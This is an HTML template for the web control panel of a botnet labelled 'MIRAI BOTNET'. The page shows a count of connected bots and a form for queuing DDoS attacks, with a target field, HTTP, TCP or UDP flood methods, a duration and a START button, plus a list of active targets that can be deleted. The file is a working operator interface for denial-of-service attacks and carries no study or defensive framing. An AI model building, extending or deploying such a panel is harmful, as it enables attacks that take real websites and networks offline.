<!DOCTYPE html>
<html>
<head>
	<title>MIRAI BOTNET</title>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width initial-scale=0.50">
</head>
<body>


<div class="bots"><h2>Bots: {{ count }}</h2></div>
<div class="wrap_content">

	<form action="/AddTask" method="POST">
		<center><h1>BY MIRAI DDOS</h1></center>
		<input type="text" name="target" placeholder="Target"><br>
		<select name="method" id="method">
			<option selected disabled>Method L7 (http://ex.com)</option>
			<option>HTTP</option>
			<option selected disabled>Method L4 (0.0.0.0:80)</option>
			<option>TCP</option>
			<option>UDP</option>
		</select>
		<br>
		<input type="text" name="timess" placeholder="Time"><br>
		<button>START</button>
	</form>

	<div class="target">
		<h4>{{ target }}</h4>
		{% for i in tasks %}
		<div class="targetenum">
			<code>{{i.target}}</code>
			<a href="/DelTask/{{i.id}}"><code>DEL</code></a>
		</div>
		{% endfor %}
	</div>
</div> 
</html>


<style type="text/css">
	*{
		padding: 0;
		margin: 0;
		text-decoration: none;
		list-style: none;
	}
	body{
		background: #1a1e21;
	}

	.header{
		width: calc(100% - 10px;);
		padding: 5px;
		display: flex;

	}
	.header h2{
		margin-top: 20px;
		margin-left: 5px;
		color: white;
		font-family: 'Roboto', sans-serif;

	}
	.header i{
		margin-top: 10px;
		margin-left: 5px;
		color: white;

	}

	
	#header_img{
		width: 70px;
		height: 70px;
		border-radius: 50%;
	}
	.wrap_content{
		width: 370px;
		
		background: none;
		
		border-radius: 5px;
		position: absolute;
		left: 0;
		right: 0;
		margin: 0 auto;
		top: 200px;
	}
	.wrap_content h1{
		font-family: 'Roboto', sans-serif;
		color: #ffffff;
		margin-bottom: 15px;
	}

	.wrap_content input{
		margin-bottom: 15px;
		
		width: 360px;
		border:none;
		height: 17px;
		font-size: 18px;
		padding: 5px;
		border-radius: 5px;
	}
	.wrap_content select{
		margin-bottom: 15px;
		
		width: 370px;
		border:none;
		height: 27px;
		font-size: 18px;
		padding: 5px;
		border-radius: 5px;
	}

	.wrap_content button{
		border:none;
		background: #a16ebd;
		color: white;
		font-family: 'Roboto', sans-serif;
		font-weight: bold;
		width: 370px;
		height: 40px;
		cursor: pointer;
		border-radius: 5px;

	}
	.wrap_content button:hover{
		background: #80508a;
	}
	.target{
		margin-top: 30px;
		color: white;
		font-family: 'Roboto', sans-serif;
		padding: 10px;
		
	}
	.targetenum{
		margin: 10px;
		margin-left: 15px;
		margin-right: 15px;
	}
	.targetenum a{
		font-family: 'Roboto', sans-serif;
		background: red;
		font-weight: bold;
		padding-left: 8px;
		padding-right: 8px;
		color: white;
		cursor: pointer;
		text-decoration: none;
		float: right;
	}
	.bots{
		font-family: 'Roboto', sans-serif;
		color: white;
		margin: 10px;
	}

</style>